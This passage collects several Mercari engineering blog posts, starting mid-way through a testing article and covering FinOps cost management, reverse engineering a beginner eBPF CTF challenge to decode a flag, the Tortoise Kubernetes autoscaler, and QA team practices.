Issue Handling and Verifications: Actively managing reported issues by investigating root causes, implementing fixes, and verifying their effectiveness. This involves collaboration with development and operations teams to prioritize and address issues efficiently.
Support Hotfixes Deployment: Developing and deploying hotfixes as needed to address critical issues or vulnerabilities identified post-release. This may involve expedited testing and release cycles to minimize disruption to users and maintain the integrity of the software.
Performance Monitoring and Optimization: Conducting ongoing performance testing and optimization efforts to ensure that the software continues to meet performance requirements and user expectations. This includes identifying performance bottlenecks, optimizing code, and scaling resources as needed to maintain optimal performance levels.

By proactively addressing post-release testing support activities at Mercari, we effectively mitigate risks, maintain user satisfaction, and ensure the long-term success of our software products in production environments.

Conclusion

In conclusion, Mercari’s adoption of modern software testing techniques encompasses a wide array of methodologies and practices aimed at enhancing the quality, reliability, and performance of its software products. From shift-left testing to continuous integration and deployment, API and frontend testing to exploratory and production testing, each approach plays a crucial role in ensuring that software meets the evolving needs and expectations of users. By embracing these techniques, Mercari accelerates delivery cycles, reduces costs, and delivers superior user experiences, ultimately driving business success in today’s competitive landscape.

FinOps at Mercari

Fri, 29 Mar 2024 13:21:21 GMT

Introduction

Hello, I am Yuji Kazama, the Engineering Manager of the FinOps team at Mercari. Since the inception of Mercari Group, we have heavily relied on the public cloud to deliver diverse services to our customers. This article sheds light on the FinOps initiatives being carried out at Mercari Group to enhance the value derived from cloud services.

What is FinOps

Rising cloud costs have put the spotlight on FinOps, a concept defined by the FinOps Foundation as “an operational framework and cultural practice which maximizes the business value of the cloud, enables timely data-driven decision making, and creates financial accountability through collaboration between engineering, finance, and business teams”.

Let’s delve into the nature of cloud costs. Prior to cloud technology, predicting demand, procuring servers, and establishing data centers in-house were necessary steps, posing a challenge when demand forecasts shifted and shifting flexibility in business needed a response.

The advent of cloud technology, while crucial for launching new businesses, introduced a cost consumption model distinct from traditional data centers, characterized by being “decentralized”, “valuable”, and “scalable”.

The term “decentralized” indicates that engineers, detached from financial and procurement divisions, practically govern cloud usage. The term “variable” suggests significant fluctuations in cloud costs, unlike fixed data center costs. “Scalable” denotes quick utilization of the cloud, which could lead to resource over-allocation.

FinOps at Mercari

Embracing a microservice architecture, Mercari Group uses Google Cloud Platform (GCP) as its primary cloud provider, operates over 200 microservices, and mandates upwards of 4000 Kubernetes Pods. We also store data on a petabyte scale, which is used for refining our products for users and propelling business growth.

In July 2022, Mercari embarked on FinOps activities due to the consistent rise in cloud costs outpacing business growth, underscoring the need for cloud cost optimization.

There were three main challenges that needed to be tackled. The first challenge was unpredictable cost increases. Monthly GCP invoices often contained unforeseen charges, necessitating urgent investigations. The second was the opaque cost structure – the difficulty in understanding the cost allocation across various projects and services within the company. The last one was that fostering cost optimization cooperation across Mercari Group was hindered by organizational barriers.

Cost Visibility

Understanding costs is paramount. We started developing cost dashboards showcasing the service and cost distribution among the companies and business units. This has made it possible to understand cloud costs in near real-time, where they used to be aggregated on a monthly basis. If a sudden increase in costs is detected, we confirm the situation with the relevant engineers to check whether the cost increase was intentional.

Goal Setting

Next, we focused on setting goals. We established KPIs for each business perspective and major GCP cost drivers, set OKRs related to FinOps every quarter, and are working on cost optimization measures.

From a business perspective, we are tracking the difference between budget and actuals. Additionally, at Mercari, we track the infrastructure cost per transaction incurred by customers for each transaction in our marketplace. The primary cost drivers for GCP mainly involve computing resources, as well as data warehouse and storage resources. While tracking KPIs such as resource utilization rates, the application rate of CUDs and Spot VMs, and the application rate of data retention policies, we are implementing numerous cost optimization measures.

Category	KPI	Examples of optimization
Business	Budget vs Actual, Cost per Transaction	(N/A)
Compute Resources	Resource utilization ratio, CUD adopotion ratio, Spot VM adoption Ratio	Terminate unused resources, Rightsizing, Improve auto scaling, Develop resource recomencation tools
DW/Storage Resources	Data reduction ratio, Lifecycle policy ratio	Delete unused resources, Apply retention/archive policy, Develop resource recomendation tools

For those interested in the details of the optimization measures, see also the following articles.

Regular Reporting

We establish a routine report system. We have made it a practice to report on the cloud cost regularly to engineers, finance teams, and executives.

For engineers, during the monthly All Hands meeting, we report on the cost and also commend the cost optimization activities carried out by engineers. Furthermore, if a sudden increase in costs is detected, we confirm the situation with the relevant engineers to check whether the cost increase was intentional.

For the finance team, while providing information on the cloud cost situation, we support discussions on cloud budget formulation according to each company’s business strategy. Additionally, by proposing metrics such as cost per transaction and other Unit Economics indicators that we introduced earlier, we have been able to facilitate constructive discussions about the relationship between business growth and cloud costs.

For executives, we report on the progress of OKRs weekly and provide a monthly report on the overall cost of the group companies.

Promoting Cost Consciousness

At Mercari, we regularly host internal hackathons where engineers can work on experimental feature development and performance improvements that are difficult to do in their usual development activities. By establishing a special “FinOps Award” during these internal hackathons, we are also creating a culture that encourages cost awareness among engineers.

We started FinOps as a cross-organizational project activity. It was challenging to maintain the momentum needed to continue involving the entire group of companies. To continuously implement FinOps, we established a dedicated FinOps organization. The challenge that the FinOps team wants to address is achieving a “culture shift” across the entire Mercari Group. Those who use the cloud must take responsibility for their cloud usage and cost. Moreover, teams that use the cloud should be concerned about the ROI (Return on Investment) of the features provided by the Mercari app and system investments. The FinOps team plays a role in facilitating stakeholders from each group to make such a culture shift possible.

Results

The FinOps approach has yielded noteworthy benefits, achieving over 30% in cost optimization and enhancing group-wide communication on cloud costs, thereby expediting decision-making and allowing us to proactively manage cost surges. We saw a significant cultural shift, with “FinOps” becoming part of the daily lexicon among engineers, reflecting a heightened awareness of cloud cost management.

Additionally, Mercari held the first Japan FinOps Meetup at the office in order to provide an environment for learning about FinOps by building a network of people in Japan who are interested in FinOps.

Conclusion

This article outlines the FinOps endeavors by Mercari Group to maximize cloud service value. Mercari is looking for engineers. The cultural shift described above has not been fully actualized yet. As we continue to evolve our platform and foster this cultural shift, we welcome engineers passionate about contributing to such initiatives to join us at Mercari.

Software Engineer (Cloud FinOps) – Mercari

An Introduction to Reverse Engineering for eBPF Bytecode

Wed, 28 Feb 2024 11:54:50 GMT

Introduction
What is eBPF?
Let’s try the eBPF Challenge
Capturing the Flag
Conclusion

Introduction

Hi, I’m Chihiro from the Threat Detection and Response team! Since joining Mercari, Inc. last July, I have been focused on detection engineering for cloud environments, incident response, and development of our own SOAR (Security Orchestration Automation and Response) platform.

Mercari has an official system to support club activities (Bukatsu 部活), and there are various club activities that we can participate in. Lately, I have been taking part in CTF (Capture the Flag) cyber security competitions as part of our club activity. In this blog, I would like to explain how an eBPF program is structured and processed, using as an example a reverse engineering challenge related to eBPF that was interesting for me in a CTF that I have participated in recently.

What is eBPF?

eBPF is a technology designed to run in the Linux kernel space, it is used for packet filtering and tracing and can aid in investigating performance issues. eBPF is indirectly utilized by many projects under the Cloud Native Computing Foundation (CNCF) such as Cilium (a container network interface) and Falco (a container runtime security tool).

eBPF bytecode has a unique instruction set as it is executed sandboxed on a special virtual machine. As a result of this, eBPF bytecode is based on an instruction set that is different from the normal operating system. I will explain the instruction set below but for more information, please refer to the official eBPF Instruction Set documentation.

In general, any programming language has areas to store computed values. In the case of eBPF’s virtual machine there are small-scale memory areas called registers to store computed values. These include 10 general purpose registers:

R0: Stores a return value of a function, and exit value for an eBPF program
R1 – R5: Stores function arguments
R6 – R9: For general purpose usage
R10: Stores an address for stack frame

Let’s check out the instructions below. The eBPF instructions have fixed length, similar to the instructions in RISC architecture. An instruction is 64 bits in length. More specifically, the instruction consists of the parts shown below:

Opcode specifies the instructions to be performed. There are various instructions such as moving a value to a destination register, arithmetic operations, and conditional branches. The opcode field consists of smaller parts to represent these specific instructions. The value to be assigned is stored in the Immediate field.

Take a look at the example below. It shows the 64 bit value that represents the instructions to be performed. Please note that the value is written by little-endian so that the left part is lower byte.

b7 01 00 00 44 04 05 1c

The value b7 in the first section is Opcode, and it can be converted into binary as 1011 0111. The lower 3 bits are 111, which represent an instruction such as BPF_ALU64.

The first 4 bits, 1011 are defined as BPF_MOV on BPF_ALU64. This is an instruction to copy the data from the source register to the destination register. The remaining fourth bit represents if the source is used by a register or 32-bit immediate value. If this value is 0, an immediate value is used for the source.

For the second byte, we can represent the value as 0000 0001 in binary. The binary is split into two parts, which are the source register and the destination register. In this example, the destination register is 1 which is the R1 register, and the source register is the R0 register.

However, as we previously stated, the source is an immediate value instead of a register. Therefore, we can take in the instruction that is storing an immediate value, 0x1c050444 to the R1 register.

Let’s try the eBPF Challenge

This challenge is a beginner-friendly reverse engineering challenge from Backdoor CTF. Backdoor CTF has been held since 2013 according to CTFtime.

CTFs involve solving a variety of challenges related to computer science and cyber security. The goal of each challenge is to obtain a flag, which is typically formatted as FLAG{COOL_FLAG_NAME}. In terms of reverse engineering challenges, hidden flags are commonly obtained by analyzing the binary files.

Most of the reverse engineering challenges are about analyzing Linux or Windows executable files. However, sometimes we can see challenges involving other file formats. Therefore, what we should do first is to identify the file type by using the file command. Using this command we can reveal that the file is an eBPF program as follows:

root@6d1def7da3d3:~# file babyebpf.o
babyebpf.o: ELF 64-bit LSB relocatable, eBPF, version 1 (SYSV), not stripped

There are typically two approaches to solve this challenge:

Run the eBPF program
Understand the code within the file using reverse engineering techniques

We will take the latter approach this time for curiosity’s sake!

As we learned earlier, it is hard to analyze all the instructions in the binary file manually. Therefore, we usually use a conversion technique called disassembly, which is a technique to automate these conversions. Disassemble converts the machine code into a mnemonic: a mnemonic is a human-friendly text based instruction.

To disassemble the eBPF bytecode I recommend using the llvm-objdump command. With the -d option, we can disassemble the binary file. The command by default displays the original hexadecimal values along with the mnemonics, but the results would be too verbose. We can use the --no-show-raw-insn flag to hide the hexadecimal part and focus on just the mnemonic instructions.

root@6d1def7da3d3:~# llvm-objdump --no-show-raw-insn -d babyebpf.o

babyebpf.o: file format elf64-bpf

Disassembly of section tp/syscalls/sys_enter_execve:

0000000000000000 <detect_execve>:
       0:   r1 = 0x1c050444
       1:   *(u32 *)(r10 - 0x8) = r1
       2:   r1 = 0x954094701340819 ll
       4:   *(u64 *)(r10 - 0x10) = r1
       5:   r1 = 0x10523251403e5713 ll
       7:   *(u64 *)(r10 - 0x18) = r1
       8:   r1 = 0x43075a150e130d0b ll
      10:   *(u64 *)(r10 - 0x20) = r1
      11:   r1 = 0x0

0000000000000060 <LBB0_1>:
      12:   r2 = 0x0 ll
      14:   r2 += r1
      15:   r2 = *(u8 *)(r2 + 0x0)
      16:   r3 = r10
      17:   r3 += -0x20
      18:   r3 += r1
      19:   r4 = *(u8 *)(r3 + 0x0)
      20:   r2 ^= r4
      21:   *(u8 *)(r3 + 0x0) = r2
      22:   r1 += 0x1
      23:   if r1 == 0x1c goto +0x1 <LBB0_2>
      24:   goto -0xd <LBB0_1>

00000000000000c8 <LBB0_2>:
      25:   r3 = r10
      26:   r3 += -0x20
      27:   r1 = 0x1c ll
      29:   r2 = 0x4
      30:   call 0x6
      31:   r0 = 0x1
      32:   exit

I will briefly explain how to interpret the disassembled code. For example, to express an assignment of the value 10 to the r1 register, we use the notation r1 = 10. When assigning data to a location in memory we use a notation like *(u32*)(r10) = r1. In this example we take the value of the r10 register as an address, and the value of r1 is assigned to the memory pointed to by that address.

Let’s begin by looking at the detect_execve function.

0000000000000000 <detect_execve>:
       0:   r1 = 0x1c050444
       1:   *(u32 *)(r10 - 0x8) = r1
       2:   r1 = 0x954094701340819 ll
       4:   *(u64 *)(r10 - 0x10) = r1
       5:   r1 = 0x10523251403e5713 ll
       7:   *(u64 *)(r10 - 0x18) = r1
       8:   r1 = 0x43075a150e130d0b ll
      10:   *(u64 *)(r10 - 0x20) = r1
      11:   r1 = 0x0

This code assigns 0x1c050444, which is 470090820 in decimal, as an immediate value to the r1 register, then copies the value to the address pointed to by r10-8 in memory. Please note that the r10 register points to the address of the stack frame. Therefore, it means the code assigns the value to a local variable. We can also see similar code next line onwards. Finally, the r1 register is set to 0. The below figure shows the stack layout after these instructions were executed.

Let’s continue to read the disassembled code, and check the bottom of this function first.

0000000000000060 <LBB0_1>:
      12:   r2 = 0x0 ll
      14:   r2 += r1
      15:   r2 = *(u8 *)(r2 + 0x0)
      16:   r3 = r10
      17:   r3 += -0x20
      18:   r3 += r1
      19:   r4 = *(u8 *)(r3 + 0x0)
      20:   r2 ^= r4
      21:   *(u8 *)(r3 + 0x0) = r2
      22:   r1 += 0x1
      23:   if r1 == 0x1c goto +0x1 <LBB0_2>
      24:   goto -0xd <LBB0_1>

We can see an if statement, where the instruction compares the r1 register and 0x1c (28 in decimal). If they are equal, the program jumps to LBB0_2 label. If not, it goes back to the first line of the LBB0_1 label. Through this analysis we can reach the conclusion that these instructions are equivalent to loop statements of a high-level programming language. In fact, before the if statement, we can see the value stored in register r1 is incremented by 1. This shows that the program is using the r1 register as a loop counter.

Let’s read the code again, keeping in mind that there is a loop statement. First, the code assigns 0 to the r2 register, then adds the value of the r1 register to the r2 register. In the beginning, the r1 register is set to 0 as explained in the detect_execve function, so the r2 register will be 0 if it is added. Next, the code stores the data by dereferencing the address in the r2 register.

Let’s take a look at the r3 register. It is copied from the r10 register, which is the stack address. Then 32 is subtracted from the r3 register. 32 is equal to the exact offset from the address of the stack frame to the address of the local variable. Then, the address is added to the value in the r1 register, dereferencing the pointer, storing the data in the local variable to the r4 register. After that, the values stored in r2 and r4 registers are XOR’ed and the result is stored in the r2 register. Finally, the data pointing by the r3 register, which is the data of the local variable, is overwritten by the result.

After all of the above, the value of the r1 register is incremented by 1, and the if statement of the loop is evaluated. Therefore, we can conclude that the code block performs an XOR operation with two data points per byte, then overwrites the data in the local variable. Also, the r1 register is compared to 28, so we can guess that length of the data is expected to be 28 bytes.

But exactly what kind of data is stored in the r2 register? Since we cannot find out the data using only the disassembled code, we continue to investigate the binary file from a different perspective. Generally, binary files embed in themselves interesting strings. We can try to extract those strings with the strings command from GNU Binary Utilities.

root@6d1def7da3d3:~# strings -tx -a babyebpf.o
     5c G   T   {
    148 marinkitagawamarinkitagawama
    16e W>@Q2R
    179 G   T   D
    2a5 .text
    2ab detect_execve.____fmt
    2c1 _version
    2ca .llvm_addrsig
    2d8 detect_execve
    2e6 .reltp/syscalls/sys_enter_execve
    307 _license
    310 baby_ebpf.c
    31c .strtab
    324 .symtab
    32c .rodata
    334 LBB0_2
    33b LBB0_1
    342 .rodata.str1.1

According to the result, we found that there are some interesting strings. Based on the result about data length, marinkitagawamarinkitagawama is the most interesting string of all the strings because the data length is exactly 28 bytes:

root@6d1def7da3d3:~# echo -n marinkitagawamarinkitagawama | wc -c
28

Lastly, we will read the instructions on the LBB0_2 label.

00000000000000c8 <LBB0_2>:
      25:   r3 = r10
      26:   r3 += -0x20
      27:   r1 = 0x1c ll
      29:   r2 = 0x4
      30:   call 0x6
      31:   r0 = 0x1
      32:   exit

In this code block, we should pay attention to the call instruction. The call instruction can execute functions that are local to the eBPF program, but it can also execute functions specified by an integer argument. The mapping between those functions and integer values is defined in the Linux source code; 6 looks like the trace_printk function. Therefore, we get the idea that this code intends to print something. The code also stores the address of the local variable to the r3 register as the third function argument. This allows us to guess that this eBPF program is going to display the XOR encoded or decoded data pointed by the value in the r3 register.

Capturing the Flag

Let’s create a script to emulate the decoding algorithm in order to solve this challenge by what we’ve learned. I usually use the Ruby programming language to solve CTF challenges and below is my solution for this challenge. Any programming language is ok, so feel free to write the script in a programming language of your choice.

#!/usr/bin/env ruby
encoded = [
    0x43075a150e130d0b,
    0x10523251403e5713,
    0x954094701340819,
    0x1c050444
].pack('Q*').chars
key = "marinkitagawamarinkitagawama".chars

key.zip(encoded) do |k, e|
  print (k.ord ^ e.ord).chr
end

The above Ruby script displays the data conducted XOR operation with the value of the local variable assigned and the embedded value in the binary file per byte.

By running this script, we could extract the following flag.

root@6d1def7da3d3:~# ruby solve.rb
flag{1n7r0_70_3bpf_h3h3h3eh}

Conclusion

In this blog, I explained the internals of eBPF along with a reverse engineering challenge. I’m sure there are many people using eBPF indirectly without really realizing it. However, there aren’t many who know about the internal details in depth. While the opportunity to use this knowledge may not come up often, it is still a great skill set to have under your belt when you need to debug and investigate problems at a lower level.

Thank you for reading! I hope this blog will help you.

Tortoise: Outpacing the Optimization Challenges in Kubernetes at Mercari

Tue, 06 Feb 2024 12:21:04 GMT

I’m Kensei Nakada (@sanposhiho), an engineer of the Platform team at Mercari. I’m working on autoscaling/optimizing Kubernetes resources in the Platform team at Mercari, and I also participate in the development around SIG/Scheduling and SIG/Autoscaling at Kubernetes Upstream.

Mercari has a company-wide FinOps initiative, and we’re working on Kubernetes resource optimization actively.
At Mercari, the Platform team and the service development team have distinct responsibilities. The Platform team manages the basic infrastructure required to build services and provides abstracted configurations and tools to make them easy to work with. The service development team then builds the infrastructure according to the requirements of each service.
With a large number of services and teams, optimizing company-wide Kubernetes resources in such a situation presented many challenges.

This article describes how the Platform team at Mercari optimized Kubernetes resources so far, how we found it difficult to optimize them manually, and how we started to let Tortoise, an open source tool we released, optimize our resources.

Kubernetes resource optimization journey at Mercari

Kubernetes resource optimization has two perspectives:

Node optimization: Instance rightsizing / Bin Packing to reduce unallocated resources in each Node. Change the machine type to an efficient / cheaper one.
Pod optimization: Workload rightsizing to increase the resource utilization of each Pod.

For the former, the Platform can optimize by changing settings at the Kubernetes cluster level. The most recent example for this in Mercari was changing the Node instance type to T2D.
In contrast, the latter requires optimization at the pod level, requiring changes to Resource Request/Limit or adjustments to the autoscaler configuration in each service based on the characteristics of how resources are usually consumed in the service.

Resource optimization itself requires efficient use of resources without compromising service reliability, and such safe optimization often requires in-depth knowledge of Kubernetes.

On the other hand, since Mercari adopts the microservices architecture, there are currently more than 1000 Deployments, and each microservice has its own development team.

In this situation, it is difficult to demand such in-depth knowledge from developers of all services, and there is also a limitation for the Platform team going around optimizing each individual service.

Therefore, the Platform team has provided tools and guidelines to simplify the optimization process as much as possible, and the development teams of each service have followed the guidelines to optimize Kubernetes resources across the company.

Kubernetes Autoscalers at Mercari

There are two official autoscalers provided by Kubernetes.

Horizontal Pod Autoscaler (HPA): Increases or decreases the number of pods according to pod resource usage.
Vertical Pod Autoscaler (VPA): Increases or decreases the amount of resources available to a Pod based on the Pod’s resource usage.

HPA is quite popular at Mercari, and almost all Deployments that are large enough to warrant its use are managed with HPA. In contrast, VPA is rarely used. HPA is most often configured to monitor the CPU usage, while Memory is managed manually in most cases.

To make the article easier to understand, we will give a light introduction to the HPA configuration.
HPA requires target resource utilizations (threshold) to be set for resources in each container. In the example below, the ideal utilization is defined as 60% for the CPU of the container named application. HPA adjusts the number of pods so that the resource utilization is close to 60%.

apiVersion: autoscaling/v2 
kind: HorizontalPodAutoscaler
metadata:.
  name: <HPA_NAME>
  namespace: <NAMESPACE_NAME>
//...
metrics:
  type: ContainerResource
  containerResource:
    name: cpu
    container: application
    target:
      type: Utilization
      averageUtilization: 60

There are many other parameters available in HPA such as minReplicas which determines the minimum number of pods. Please refer to the official documentation for further details.

Resource Recommender Slack Bot

Mercari’s Platform team provides an internal tool called Resource Recommender for resource optimization purposes.This is a Slack Bot that calculates the optimal resource size (Resource Request) once a month and notifies every service development team. This is intended to simplify resource optimization.

Internally, it utilizes VPA: it calculates the best and safest values from the VPA recommendations of the past months.

However, we have some challenges with Resource Recommender.

The first challenge lies in the safety of recommended values. The recommended values start to get stale gradually after they are sent, and the accuracy of the recommended values fades away as time passes. Changes including application implementation changes, or changes in traffic patterns could result in the actual recommended values to change significantly compared when they were initially sent. Using outdated values could potentially lead to dangerous situations such as the application being OOMKilled in the worst case.

The second challenge is that service developers are not always willing to adopt these recommended values. Due to the possible issue with the automatically recommended values, developers need to carefully check if the values are really safe or not before applying them. They must also continue monitoring after applying these changes and make sure that there are no problems. This can take up a significant amount of engineers’ time in every team.

And the final challenge is that optimization never ends as long as the service keeps running. The recommended values will continue to change due to various changes in circumstances, Which means that developers have to continuously put effort tuning Kubernetes resources.

HPA optimization

Adding on the above issues, the most significant problem is the HPA.
In order to run your Pods with optimal resource utilization, you need to optimize HPA settings themselves instead of optimizing the size of your resource. However, Resource Recommender does not support the calculation of recommended values for HPA settings.
As mentioned earlier, Mercari has mostly HPAs for services of scale and they target CPU. It means that most of the CPUs used in the cluster cannot be optimized by Resource Recommender.

First, you have to consider increasing the target resource utilization (threshold) as high as possible, without hurting the reliability of services.
At the same time in reality there are many scenarios in which the actual resource utilization does not reach the target resource utilization (threshold) set in the HPA. In such cases you will have to adjust different parameters depending on which scenario your HPA is in.

HPA optimization is a very complex subject and requires in-depth knowledge to understand, so much so that it warrants its own article. Its complexity makes it difficult to work with from Resource Recommender. However it is not practical to expect all teams to regularly optimize resource utilization for a huge number of HPAs.

…At this point, we realized, "…it’s impossible, isn’t it?”

The fact is, with our current structure it requires all teams to go through complex optimizations manually in HPA or in Resource Request on a regular and perpetual basis.

Resource optimization with Tortoise

Thus we started to develop a fully managed autoscaling component, named Tortoise. It’s time to stop optimizing Kubernetes resources manually!

This Tortoise is not only cute but has been trained to do all the resource management and optimization for Kubernetes automatically.

Tortoise keeps track of past resource usage and the number of replicas in the past, and continues to optimize HPA and Resource Request/Limit based on those data. If you want to know what Tortoise does under its shell (pun intended), please refer to the documentation. You will understand that Tortoise is not just a wrapper for HPA and VPA.

Before developing Tortoise, the service development teams have been responsible for resource/HPA configuration and optimization. But now they can forget about resource management/optimization altogether.
If Tortoise fails to fully optimize any of the microservices, the responsibility to improve Tortoise to fit their use case falls in the Platform team’s hands.
As a resultTortoise allows us to completely shift those responsibilities from the service development teams to the Platform team (Tortoise).

Users configure Tortoise through CRD as follows:

apiVersion: autoscaling.mercari.com/v1beta3
kind: Tortoise
metadata:
  name: lovely-tortoise
  namespace: zoo
spec:
  updateMode: Auto 
  targetRefs:
    scaleTargetRef:
      kind: Deployment
      name: sample

Tortoise is intentionally designed with a very simple user interface. Internally Tortoise automatically creates the necessary HPAs and VPAs and starts autoscaling/optimizing their workloads.

HPA exposes a significant number of parameters to be flexible enough to work with various use cases. But at the same time this same flexibility results in requiring users to have deep understanding and enough time to spend on tuning parameters.
Mercari is fortunate in that most of the services are written in Go and are gRPC/HTTP servers, as well as the fact that they are based on internal microservice templates. Therefore, the HPA configurations are actually very similar for most of the services, and the characteristics of the services, such as changes in resource usage and number of replicas, are also similar.
This allows us to hide a large number of HPA parameters behind Tortoise’s simple appearance and let Tortoise provide the same default values. Meanwhile, we can start optimizing through Tortoise’s internal recommendation logic. This approach has proven to be working pretty well for us.

Also, in contrast to the simple user interface (CRD), Tortoise has many settings for cluster administrators.
This allows the cluster administrator to manage the behavior of all Tortoises based on the behavior of the services in that cluster.

Safe migration and evaluation to Tortoise

As mentioned above, Tortoise is basically an alternative to HPA and VPA – creating Tortoise eliminates the need for HPA. There are, however, many Deployments in Mercari already working with HPA as mentioned above.
To migrate from HPA to Tortoise in this situation, we needed to safely perform complicated resource operations, from creating Tortoise to deleting HPA.

In order to make such a transition as simple and safe as possible, Tortoise has spec.targetRefs.horizontalPodAutoscalerName for smooth migration from an existing HPA.

apiVersion: autoscaling.mercari.com/v1beta3
kind: Tortoise
metadata:
  name: lovely-tortoise
  namespace: zoo
spec:
  updateMode: Auto 
  targetRefs:
    # By specifying an existing HPA, Tortoise will continue to optimize this HPA instead of creating a new one.
    horizontalPodAutoscalerName: existing-hpa 
    scaleTargetRef:
      kind: Deployment
      name: sample

By using horizontalPodAutoscalerName, it allows the existing HPAs to be seamlessly migrated to a Tortoise-managed HPA, hence lowering the cost of migration.

We are currently migrating many services to Tortoise in our development environment to evaluate Tortoise. Tortoise has an updateMode: Off for DryRun which allows us to validate the recommended values through the metrics exposed by the Tortoise Controller.

In the development environment, a significant number of services have already begun working with Tortoise in Off mode, and about 50 services have already begun using autoscaling with Tortoise.
We’re planning to roll it out to the production in the near future, and Tortoise will become even more sophisticated for sure!

Summary

This article described Mercari’s Kubernetes resource optimization efforts so far, the challenges we have seen, and how Tortoise, which was born out of these challenges, is trying to improve our Platform.

Mercari is looking for people to work with at Platform.
Would you like to work together to improve CI/CD, create various abstractions to improve developer experience… and breed tortoises? If you are interested, please check out our job description!

Quality at Speed: Empowering Marketplace Engineering Teams to achieve our QA Mission

Fri, 02 Feb 2024 12:05:48 GMT

Introduction

Hello everyone! I’m @Udit, an Engineering Manager (QA) at Mercari.

At Mercari, we emphasize every team member’s role in writing tests, automating tests, and reporting bugs. While it is important for QA experts to be able to optimize testing, automate processes, and provide solid QA processes within the team to ensure high-quality testing experiences, it is also very important to shift away from the notion that QA being solely responsible for all testing. Instead, we emphasize collaboration within QA and other teams. We encourage QA members to become integral team players, aligning their efforts with the team’s objectives and iterating on processes together.

In this article, we will describe how we achieve the goal of delivering quality with speed through a collaborative and team-oriented approach to quality assurance, in line with the QA team’s mission.

Role and Responsibilities

QA plays a vital role in assisting teams to independently accomplish all the quality-related tasks specified in this guideline. Their primary focus lies in enhancing the testing process, offering valuable test tools, sharing their extensive testing knowledge, and monitoring essential testing metrics. By providing this support, QA empowers teams to effectively manage their own quality assurance responsibilities.

QA responsibilities are:

Actively participate in team meetings, ceremonies, and feature kickoffs.
Collaborate with the team on test planning activities.
Review and ensure the implementation and execution of planned tests.
Maintain a healthy Test Pyramid structure.
Develop both manual and automated tests as required.
Execute tests and provide assistance during test execution.
Share comprehensive knowledge about our product.
Facilitate onboarding of teams and members on testing techniques.
Categorize and execute automated tests for Release Judgment.
Continuously iterate and improve the QA processes within the teams.
Support and assist teams without QA in implementing QA processes.
Share quality metrics with teams for retrospective analysis.

Overview of the Testing Process

The diagram provided illustrates the various stages involved in testing activities, starting from the initial feature definition to its final release. Let me explain how each stage works.

Definition

Scrum Team members (PMs, Developers, QAs) review and agree on requirements/specifications based on the perspectives such as follows;

Ensuring comprehensive feature definition.
Eliminating ambiguity from requirements.
Making requirements testable.
Maintaining up-to-date supporting documentation.

To provide further context, these activities are achieved through various practices such as reviewing feature test scenarios and actively participating in kickoff meetings with PMs, etc.

QA Kickoff

The QA member and the software engineer, along with other stakeholders, collaborate on a story/bug, ensuring that sufficient testing is being planned for the ticket. These plannings include;

Planning tests for each acceptance criteria thoroughly.
Planning tests for the happy path of the feature.
Planning tests for edge cases to cover all potential scenarios.
Planning tests for the interaction of the feature with other features.
Evaluating non-functional requirements such as performance and accessibility.
Planning post-release testing activities.

To ensure traceability, the mentioned tests should be referenced and linked to the development ticket.

In the test plan, it is crucial to identify and distinguish between manual and automated tests, specifying the appropriate level for each. This helps in achieving a balanced and healthy test pyramid structure. Additionally, nailing down common and edge cases is another valuable aspect to consider in the test plan.

Instead of including an end-to-end (E2E) test for the edge case, such as verifying that an item priced at ¥0 cannot be listed, consider the following alternatives:

Write a unit test to evaluate the business logic.
Create an API test for the listing endpoint.
Develop a minimal UI test (with backend fake/mocks) to validate the error message displayed on the UI.

Test Development

When working on a feature, it is important to include planned automated tests in the same ticket alongside the coding process. During the code review, ensure that the tests are implemented at the appropriate level in the pyramid structure, rather than higher up.

For teams, the Definition of Done includes creating, executing, and passing all the planned tests, including unit, integration, end-to-end (e2e), manual, and others. It is also crucial to triage all bugs discovered during testing, especially P0 (Urgent) and P1 (Important) bugs, as they can have a significant impact on the functionality of the feature as a whole. Reviewing adherence to the Definition of Done falls within the domain of QA. Moreover, any new code should not break the automated tests of other features, and it is the responsibility of the development team to maintain them.

Some test development can be deferred until the feature is complete, especially if certain tests are not necessary during the early stages, such as UI tests for experiments that might be dropped. However, it is important to create a separate task for handling the development of these tests in the future and ensure that it is associated with the appropriate Epic or Story.

In addition to automated tests, it is valuable to conduct manual testing using techniques like exploratory testing, scenario testing, and dogfooding.

Exploratory testing allows testers to uncover bugs and issues in an unscripted manner, while scenario testing helps validate specific use cases. By engaging in exploratory-like tests, testers can explore the software to discover potential issues and evaluate its behavior in real-world scenarios.

Dogfooding, also known as "eating your own dog food," is the practice of using your own products or services within your own organization. By implementing this approach, we prioritize becoming the primary users and testers of the products we create. This enables us to gain valuable insights from a user’s perspective, identify potential issues, and gather feedback that helps us continuously improve the quality of our offerings. Through dogfooding, we validate our products in real-world scenarios, enhancing their usability and aligning our development team with the needs of users.

Demo

After completing the ticket and ensuring that the feature has reached a mature stage, it is beneficial to convene a review session with the requirements writer, QA member, and software engineer. This review aims to evaluate whether the feature effectively fulfills its intended purpose.

Additionally, it is worth considering recording a feature review to showcase the usage and functionality of the feature. This recording serves as a valuable resource for sharing information with other teams or members within the organization.

Ship

Once a feature reaches the branch cut and becomes part of the upcoming release build, it becomes the responsibility of the entire team to ensure its continued functionality. This accountability extends beyond just QA members.

To properly track and identify the versions in which the features were shipped, it is essential to complete the correct "Fix version" field in all tickets.

During the release process, it is crucial to organize testing across the entire team to verify that the submitted features function correctly in the released build. The team should execute and maintain tests specifically related to these features.

If any tests have been added to the automated test suite as a must-pass test before every release, it is important to ensure that they are passing and are not unreliable or outdated.

Furthermore, teams are expected to take ownership of their features and screens even after they have been shipped. This includes conducting regular regression tests and actively addressing feedback received through internal and customer feedback channels. Rotating team members helps ensure that the entire team shares ownership and responsibility for the features.

Benefits and Challenges

The approach of empowering teams with QA expertise has numerous benefits. Firstly, it reduces the count of hotfixes and blockers, resulting in a smoother development and release process. With QA members actively involved in the entire testing lifecycle, requirements are better defined and ambiguity is eliminated. This leads to more comprehensive feature definition and test planning. Additionally, the focus on collaboration and iterative processes improves communication, alignment, and overall efficiency.

While the approach of empowering teams with QA expertise brings significant benefits, it also presents challenges. The transition towards a fully collaborative model requires ongoing effort and coordination. Bringing all team members on board and ensuring consistent adherence to QA processes may require time and training. Achieving a balance between manual and automated testing, as well as identifying common and edge cases, poses additional challenges. As with any evolving approach, there is always room for improvement as we strive for perfection.

Conclusion

The structure of QA teams at Mercari has proved to be very effective for us. Our approach of promoting collaboration between QA experts with other teams has been a vital part of this success.

The primary focus has been on fostering clarity and unity between QA and teams, highlighting the importance of collaboration rather than QA being solely responsible for all testing. The article encourages QA members to become integral team players, aligning their efforts with the team’s objectives and iterating over processes together.

